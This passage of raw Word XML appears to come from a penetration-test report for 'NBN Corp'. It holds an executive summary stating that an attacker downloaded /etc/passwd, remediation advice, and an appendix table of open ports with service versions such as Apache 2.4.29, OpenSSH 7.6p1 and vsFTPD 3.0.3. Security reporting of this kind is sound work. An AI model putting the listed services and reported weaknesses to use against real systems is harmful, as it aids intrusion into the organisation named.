        <w:t xml:space="preserve">. The attacker attempted to retrieve the /etc/shadow and /etc/passwd file, but only managed to download the /etc/passwd file. The critical nature of the findings indicates that NBN Corp must immediately apply security fixes to ensure data confidentiality, integrity, and availability of NBN services. Our top security recommendations are the use of complex passwords, sanitization of user inputs, and updating outdated software components. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E64050E" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:eastAsia="Roboto" w:hAnsi="Roboto" w:cs="Roboto"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F0EC85A" w14:textId="77777777" w:rsidR="0022617B" w:rsidRPr="0022617B" w:rsidRDefault="0022617B" w:rsidP="0022617B"/>
    <w:p w14:paraId="1778E8EA" w14:textId="77777777" w:rsidR="00220DD3" w:rsidRDefault="00220DD3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="330D63A4" w14:textId="77777777" w:rsidR="0022617B" w:rsidRDefault="0022617B">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E2CC683" w14:textId="7568BF0D" w:rsidR="00220DD3" w:rsidRDefault="006A08E8">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:bookmarkStart w:id="33" w:name="_Toc153834534"/>
      <w:r w:rsidR="00B41A85">
        <w:t xml:space="preserve">APPENDIX A - </w:t>
      </w:r>
      <w:r w:rsidR="007401EF">
        <w:t>Ports</w:t>
      </w:r>
      <w:bookmarkEnd w:id="33"/>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="6950" w:tblpY="303"/>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86"/>
        <w:gridCol w:w="4142"/>
      </w:tblGrid>
      <w:tr w:rsidR="007401EF" w14:paraId="47A86172" w14:textId="77777777" w:rsidTr="007401EF">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986"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000000" w:themeFill="text1"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="30" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="30" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="56F76507" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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30" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="30" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6BEB9462" w14:textId="77777777" w:rsidR="007401EF" w:rsidRDefault="007401EF" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007401EF" w14:paraId="263E80BB" w14:textId="77777777" w:rsidTr="007401EF">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="986"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21AF3758" w14:textId="5D2EC0BD" w:rsidR="007401EF" w:rsidRDefault="006A08E8" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>80</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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59EAF825" w14:textId="33A1A738" w:rsidR="007401EF" w:rsidRPr="00577A63" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="NormalWeb"/>
              <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00577A63">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Production Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00577A63">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00577A63">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Apache httpd 2.4.29 ((Ubuntu))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007401EF" w14:paraId="21545756" w14:textId="77777777" w:rsidTr="007401EF">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>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46DD3EE1" w14:textId="58EB283A" w:rsidR="007401EF" w:rsidRDefault="006A08E8" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>443</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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30C21960" w14:textId="311EB73A" w:rsidR="007401EF" w:rsidRPr="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SSH</w:t>
            </w:r>
            <w:r w:rsidRPr="006A08E8">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007401EF" w14:paraId="41DA4B62" w14:textId="77777777" w:rsidTr="007401EF">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>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3BA74174" w14:textId="44827DEC" w:rsidR="007401EF" w:rsidRDefault="006A08E8" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>8001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="41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1A86D65C" w14:textId="6105FA75" w:rsidR="007401EF" w:rsidRDefault="00577A63" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Staging</w:t>
            </w:r>
            <w:r w:rsidRPr="00577A63">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> Server</w:t>
            </w:r>
            <w:r w:rsidRPr="00577A63">
              <w:rPr>
                <w:color w:val="000000"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="00577A63">
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Apache httpd 2.4.29 ((Ubuntu))</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007401EF" w14:paraId="469AFEC7" w14:textId="77777777" w:rsidTr="007401EF">
        <w:trPr>
          <w:trHeight w:val="294"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9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6E8ABEC6" w14:textId="60213767" w:rsidR="007401EF" w:rsidRDefault="006A08E8" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>65534</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="414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5BC59967" w14:textId="35233A73" w:rsidR="007401EF" w:rsidRDefault="00577A63" w:rsidP="007401EF">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>FTP vsFTPD3.0.3</w:t>
            </w:r>
            <w:r w:rsidR="007401EF" w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:tbl>
      <w:tblPr>
        <w:tblpPr w:leftFromText="180" w:rightFromText="180" w:vertAnchor="text" w:horzAnchor="page" w:tblpX="541" w:tblpY="92"/>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158"/>
        <w:gridCol w:w="4864"/>
      </w:tblGrid>
      <w:tr w:rsidR="006A08E8" w14:paraId="15201F60" w14:textId="77777777" w:rsidTr="006A08E8">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158"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000000" w:themeFill="text1"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="30" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="30" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="388DD49A" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Port</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0000" w:themeFill="text1"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="30" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="30" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3421F0D0" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="77C7A2FF" w14:textId="77777777" w:rsidTr="006A08E8">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1158"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0C60681D" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>22</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6986E9E3" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>SSH (Secure Shell) - used for secure remote access.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="600D21C3"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40C5024E" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>25</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60F632F1" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">SMTP (Simple Mail Transfer Protocol) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="3E6E93B8"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72D52A5A" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>110</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76C6A9D7" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>POP3 (Post Office Protocol version 3</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="1D775615"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3325C200" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>143</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4A9050C4" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">IMAP (Internet Message Access Protocol) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="1081C419"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62E262B"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5268</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337AFE7D"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56A3B532"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5D4CBFE2"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5355</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646A21E8" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">LLMNR (Link-Local Multicast Name Resolution) </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="22D981C5"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16B18ED"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5782</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4A82D2A"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2B269407"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D54306C"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5843</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71D24824"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35C0DA26"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2098945"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5854</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42E3BC70"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47EC2185"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427DBCE5" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>6174</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CC475E7"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28777F96"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48CEB5DF" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>6573</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AF1DD" w:themeFill="accent3" w:themeFillTint="33"/>
            <w:tcMar>
              <w:top w:w="30" w:type="dxa"/>
              <w:left w:w="30" w:type="dxa"/>
              <w:bottom w:w="30" w:type="dxa"/>
              <w:right w:w="30" w:type="dxa"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3D23FB96" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>NBN Management Portal</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A08E8" w14:paraId="15448A20"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B666C05" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>6868</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734ABD13"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03DC379C"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173A9CC" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>7437</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4D45A51D"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6FCECC7E"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324E1418" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>9562</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7865ADF0"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4D3A6CD8"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B87E4CC" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>12824</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57615D05"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66670475"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556E871D" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>15035</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C424BEA"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2AFD3FA9"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1922DC0A" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>24204</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96035CF"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3E30E15D"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507FFABA" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>28478</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58C2A496"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09FA0A68"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74428293" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>34246</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369840C8"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34FDFA2F"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586DF1C6" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
              <w:t>40998</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CE12967"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377FF5F8"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E73A589" w14:textId="77777777" w:rsidR="006A08E8" w:rsidRDefault="006A08E8" w:rsidP="006A08E8">
            <w:pPr>
              <w:pStyle w:val="TableContents"/>
              <w:spacing w:line="331" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="1D8F7EFF">
              <w:rPr>
                <w:sz w:val="16"/>
                <w:szCs w:val="16"/>
              </w:rPr>
